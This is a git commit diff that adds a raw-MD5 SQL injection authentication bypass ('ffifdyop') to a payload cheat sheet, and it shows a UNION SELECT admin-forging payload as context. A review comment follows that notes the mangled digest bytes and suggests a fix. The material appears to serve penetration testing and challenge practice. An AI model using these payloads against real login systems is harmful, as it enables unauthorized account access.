Raw MD5 SQL injection + SSH Konami Code

Swissky
2018-09-10 23:12:29 +02:00
parent 2a080f82e6
commit 7a80647e63
2 changed files with 25 additions and 0 deletions


@@ -293,6 +293,22 @@ admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
```
## Authentication Bypass (Raw MD5)
When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.
```php
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
```
Allowing an attacker to craft a string with a `true` statement such as `' or 'SOMETHING`
```php
md5("ffifdyop", true) = 'or'6<EFBFBD>]<EFBFBD><EFBFBD>!r,<EFBFBD><EFBFBD>b
```
Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772)
## Polyglot injection (multicontext)
```sql
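Review bot: The `md5("ffifdyop", true) = 'or'6...` line in the new "Authentication Bypass (Raw MD5)" section carries the raw digest bytes, which are not valid UTF-8 and show up as `<EFBFBD>` replacement markers, so a reader cannot check the value from the page. Suggest printing only the printable prefix `'or'6` followed by the remaining bytes as hex escapes, and moving the `= ...` part into a comment since the line sits in a `php` block but is not valid PHP. The sentence above it says the string yields a `true` statement without saying why; one line explaining that the quoted string after `or` begins with the digit `6` and is therefore treated as a non-zero value would make the example self-explanatory. The section would also benefit from a closing sentence on the fix (hex digest or a parameterized query instead of concatenating `md5($password,true)` into the statement), and from blank lines around the new headings and fences to match the rest of the file.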